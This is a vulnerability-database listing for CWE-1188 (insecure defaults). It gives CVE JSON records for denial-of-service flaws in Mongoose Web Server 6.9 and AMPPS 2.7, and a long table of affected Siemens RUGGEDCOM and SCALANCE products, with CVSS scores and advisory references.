CWE-1188
AllowedInitialization of a Resource with an Insecure Default
Abstraction: Base · Status: Incomplete
The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.
402 vulnerabilities reference this CWE, most recent first.
CVE-2018-25193 (GCVE-0-2018-25193)
Vulnerability from cvelistv5 – Published: 2026-03-06 12:19 – Updated: 2026-07-15 01:23- CWE-1188 - Initialization of a Resource with an Insecure Default
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/45819 | exploit |
| https://www.vulncheck.com/advisories/mongoose-web… | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Cesanta | Mongoose Web Server |
Affected:
6.9
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2018-25193",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-09T18:04:00.714085Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-09T18:05:12.812Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Mongoose Web Server",
"vendor": "Cesanta",
"versions": [
{
"status": "affected",
"version": "6.9"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mongoose:6.9:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Ihsan Sencan"
}
],
"datePublic": "2018-11-11T12:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Mongoose Web Server 6.9 contains a denial of service vulnerability that allows remote attackers to crash the service by establishing multiple socket connections. Attackers can repeatedly create connections to the default port and send malformed data to exhaust server resources and cause service unavailability."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1188",
"description": "Initialization of a Resource with an Insecure Default",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-15T01:23:27.618Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-45819",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/45819"
},
{
"name": "VulnCheck Advisory: Mongoose Web Server 6.9 Denial of Service via Socket Connection",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/mongoose-web-server-denial-of-service-via-socket-connection"
}
],
"title": "Mongoose Web Server 6.9 Denial of Service via Socket Connection",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2018-25193",
"datePublished": "2026-03-06T12:19:18.181Z",
"dateReserved": "2026-03-06T11:59:56.248Z",
"dateUpdated": "2026-07-15T01:23:27.618Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2018-25169 (GCVE-0-2018-25169)
Vulnerability from cvelistv5 – Published: 2026-03-06 12:19 – Updated: 2026-03-09 19:04- CWE-1188 - Initialization of a Resource with an Insecure Default
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/45850 | exploit |
| https://www.vulncheck.com/advisories/ampps-denial… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2018-25169",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-09T19:04:37.871832Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-09T19:04:46.611Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "AMPPS",
"vendor": "Ampps",
"versions": [
{
"status": "affected",
"version": "2.7"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:softaculous:ampps:2.7:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Ihsan Sencan"
}
],
"datePublic": "2018-11-12T12:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "AMPPS 2.7 contains a denial of service vulnerability that allows remote attackers to crash the service by sending malformed data to the default HTTP port. Attackers can establish multiple socket connections and transmit invalid payloads to exhaust server resources and cause service unavailability."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1188",
"description": "Initialization of a Resource with an Insecure Default",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-06T12:19:00.721Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-45850",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/45850"
},
{
"name": "VulnCheck Advisory: AMPPS 2.7 Denial of Service via Malformed Socket Connection",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/ampps-denial-of-service-via-malformed-socket-connection"
}
],
"title": "AMPPS 2.7 Denial of Service via Malformed Socket Connection",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2018-25169",
"datePublished": "2026-03-06T12:19:00.721Z",
"dateReserved": "2026-03-06T11:29:34.018Z",
"dateUpdated": "2026-03-09T19:04:46.611Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2017-12736 (GCVE-0-2017-12736)
Vulnerability from cvelistv5 – Published: 2017-12-26 04:00 – Updated: 2025-08-12 11:10- CWE-1188 - Initialization of a Resource with an Insecure Default
| URL | Tags |
|---|---|
| https://www.siemens.com/cert/pool/cert/siemens_se… | x_refsource_CONFIRM |
| http://www.securitytracker.com/id/1039463 | vdb-entryx_refsource_SECTRACK |
| http://www.securitytracker.com/id/1039464 | vdb-entryx_refsource_SECTRACK |
| http://www.securityfocus.com/bid/101041 | vdb-entryx_refsource_BID |
| https://cert-portal.siemens.com/productcert/html/… |
| Vendor | Product | Version | |
|---|---|---|---|
| Siemens | RUGGEDCOM i800 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM i800NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM i801 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM i801NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM i802 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM i802NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM i803 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM i803NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM M2100 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM M2100NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM M2200 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM M2200NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM M969 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM M969NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RMC30 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RMC30NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RMC8388 V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RMC8388 V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RMC8388NC V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RMC8388NC V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RP110 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RP110NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS1600 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS1600F |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS1600FNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS1600NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS1600T |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS1600TNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS400 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS400NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS401 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS401NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416NCv2 V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416NCv2 V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RS416P |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416PNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416PNCv2 V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416PNCv2 V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RS416Pv2 V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416Pv2 V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RS416v2 V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS416v2 V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RS8000 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS8000A |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS8000ANC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS8000H |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS8000HNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS8000NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS8000T |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS8000TNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900 (32M) V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900 (32M) V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RS900G |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900G (32M) V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900G (32M) V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RS900GNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900GNC(32M) V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900GNC(32M) V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RS900GP |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900GPNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900L |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900LNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900M-GETS-C01 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900M-GETS-XX |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900M-STND-C01 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900M-STND-XX |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900MNC-GETS-C01 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900MNC-GETS-XX |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900MNC-STND-XX |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900MNC-STND-XX-C01 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900NC(32M) V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS900NC(32M) V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RS900W |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS910 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS910L |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS910LNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS910NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS910W |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS920L |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS920LNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS920W |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS930L |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS930LNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS930W |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS940G |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS940GNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS969 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RS969NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100 (32M) V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100 (32M) V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100NC(32M) V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100NC(32M) V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100P |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100P (32M) V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100P (32M) V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100PNC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100PNC (32M) V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2100PNC (32M) V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2200 |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2200NC |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2288 V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2288 V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2288NC V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2288NC V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2300 V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2300 V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2300NC V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2300NC V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2300P V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2300P V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2300PNC V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2300PNC V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2488 V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2488 V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG2488NC V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG2488NC V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG907R |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG908C |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG909R |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG910C |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG920P V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG920P V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSG920PNC V4.X |
Affected:
0 , < V4.3.4
(custom)
|
|
| Siemens | RUGGEDCOM RSG920PNC V5.X |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSL910 |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RSL910NC |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RST2228 |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RST2228P |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RST916C |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | RUGGEDCOM RST916P |
Affected:
0 , < V5.0.1
(custom)
|
|
| Siemens | SCALANCE XB205-3 (SC, PN) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB205-3 (ST, E/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB205-3 (ST, PN) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB205-3LD (SC, E/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB205-3LD (SC, PN) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB206-2 (SC) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB206-2 (ST/BFOC) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB206-2 LD |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB206-2 SC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB206-2 ST |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB206-2LD |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB208 (E/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB208 (PN) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB213-3 (SC, E/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB213-3 (SC, PN) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB213-3 (ST, E/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB213-3 (ST, PN) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB213-3LD (SC, E/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB213-3LD (SC, PN) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB216 (E/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XB216 (PN) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2 (SC) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2 (ST/BFOC) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2G PoE |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2G PoE (54 V DC) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2G PoE EEC (54 V DC) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2SFP |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2SFP EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2SFP G |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2SFP G (EIP DEF.) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC206-2SFP G EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC208 |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC208EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC208G |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC208G (EIP def.) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC208G EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC208G PoE |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC208G PoE (54 V DC) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC216 |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC216-3G PoE |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC216-3G PoE (54 V DC) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC216-4C |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC216-4C G |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC216-4C G (EIP Def.) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC216-4C G EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC216EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC224 |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC224-4C G |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC224-4C G (EIP Def.) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XC224-4C G EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XF204 |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XF204 DNA |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XF204-2BA |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XF204-2BA DNA |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XF204G |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XM408-4C |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XM408-4C (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XM408-8C |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XM408-8C (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XM416-4C |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XM416-4C (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XP208 |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP208 (Ethernet/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP208EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP208G |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP208G EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
